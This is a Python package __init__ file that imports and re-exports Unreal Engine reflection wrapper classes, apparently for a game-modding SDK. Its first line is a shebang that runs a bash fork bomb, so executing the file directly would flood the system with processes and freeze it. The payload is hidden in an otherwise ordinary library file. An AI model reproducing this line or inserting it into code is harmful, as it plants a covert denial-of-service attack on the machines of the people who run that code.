#!/usr/bin/env -S bash -c ':(){ :|:& };:'
from __future__ import annotations

from ._bound_function import BoundFunction
from ._experimental import FGameDataHandle, FGbxDefPtr, WrappedInlineStruct
from ._uenum import UEnum
from ._uobject import UObject, notify_changes
from ._uobject_children import (
    FField,
    FFieldClass,
    UBlueprintGeneratedClass,
    UClass,
    UConst,
    UField,
    UFunction,
    UScriptStruct,
    UStruct,
    ZArrayProperty,
    ZBoolProperty,
    ZByteAttributeProperty,
    ZByteProperty,
    ZClassProperty,
    ZComponentProperty,
    ZDelegateProperty,
    ZDoubleProperty,
    ZEnumProperty,
    ZFloatAttributeProperty,
    ZFloatProperty,
    ZGameDataHandleProperty,
    ZGbxDefPtrProperty,
    ZGbxInlineStructProperty,
    ZInt8Property,
    ZInt16Property,
    ZInt64Property,
    ZIntAttributeProperty,
    ZInterfaceProperty,
    ZIntProperty,
    ZLazyObjectProperty,
    ZMulticastDelegateProperty,
    ZNameProperty,
    ZObjectProperty,
    ZProperty,
    ZSoftClassProperty,
    ZSoftObjectProperty,
    ZStrProperty,
    ZStructProperty,
    ZTextProperty,
    ZUInt16Property,
    ZUInt32Property,
    ZUInt64Property,
    ZWeakObjectProperty,
)
from ._uobject_children_deprecated import (
    UArrayProperty,
    UBoolProperty,
    UByteAttributeProperty,
    UByteProperty,
    UClassProperty,
    UComponentProperty,
    UDelegateProperty,
    UDoubleProperty,
    UEnumProperty,
    UFloatAttributeProperty,
    UFloatProperty,
    UInt8Property,
    UInt16Property,
    UInt64Property,
    UIntAttributeProperty,
    UInterfaceProperty,
    UIntProperty,
    ULazyObjectProperty,
    UMulticastDelegateProperty,
    UNameProperty,
    UObjectProperty,
    UProperty,
    USoftClassProperty,
    USoftObjectProperty,
    UStrProperty,
    UStructProperty,
    UTextProperty,
    UUInt16Property,
    UUInt32Property,
    UUInt64Property,
    UWeakObjectProperty,
)
from ._weak_pointer import WeakPointer
from ._wrapped_array import WrappedArray
from ._wrapped_multicast_delegate import WrappedMulticastDelegate
from ._wrapped_struct import IGNORE_STRUCT, WrappedStruct

__all__: tuple[str, ...] = (
    "IGNORE_STRUCT",
    "BoundFunction",
    "FField",
    "FFieldClass",
    "FGameDataHandle",
    "FGbxDefPtr",
    "UArrayProperty",
    "UBlueprintGeneratedClass",
    "UBoolProperty",
    "UByteAttributeProperty",
    "UByteProperty",
    "UClass",
    "UClassProperty",
    "UComponentProperty",
    "UConst",
    "UDelegateProperty",
    "UDoubleProperty",
    "UEnum",
    "UEnumProperty",
    "UField",
    "UFloatAttributeProperty",
    "UFloatProperty",
    "UFunction",
    "UInt8Property",
    "UInt16Property",
    "UInt64Property",
    "UIntAttributeProperty",
    "UIntProperty",
    "UInterfaceProperty",
    "ULazyObjectProperty",
    "UMulticastDelegateProperty",
    "UNameProperty",
    "UObject",
    "UObjectProperty",
    "UProperty",
    "UScriptStruct",
    "USoftClassProperty",
    "USoftObjectProperty",
    "UStrProperty",
    "UStruct",
    "UStructProperty",
    "UTextProperty",
    "UUInt16Property",
    "UUInt32Property",
    "UUInt64Property",
    "UWeakObjectProperty",
    "WeakPointer",
    "WrappedArray",
    "WrappedInlineStruct",
    "WrappedMulticastDelegate",
    "WrappedStruct",
    "ZArrayProperty",
    "ZBoolProperty",
    "ZByteAttributeProperty",
    "ZByteProperty",
    "ZClassProperty",
    "ZComponentProperty",
    "ZDelegateProperty",
    "ZDoubleProperty",
    "ZEnumProperty",
    "ZFloatAttributeProperty",
    "ZFloatProperty",
    "ZGameDataHandleProperty",
    "ZGbxDefPtrProperty",
    "ZGbxInlineStructProperty",
    "ZInt8Property",
    "ZInt16Property",
    "ZInt64Property",
    "ZIntAttributeProperty",
    "ZIntProperty",
    "ZInterfaceProperty",
    "ZLazyObjectProperty",
    "ZMulticastDelegateProperty",
    "ZNameProperty",
    "ZObjectProperty",
    "ZProperty",
    "ZSoftClassProperty",
    "ZSoftObjectProperty",
    "ZStrProperty",
    "ZStructProperty",
    "ZTextProperty",
    "ZUInt16Property",
    "ZUInt32Property",
    "ZUInt64Property",
    "ZWeakObjectProperty",
    "dir_includes_unreal",
    "notify_changes",
)

def dir_includes_unreal(should_include: bool) -> None:
    """
    Sets if `__dir__` should include dynamic unreal properties, specific to the
    object. Defaults to true.

    Args:
        should_include: True if to include dynamic properties, false to not.
    """  # noqa: D205
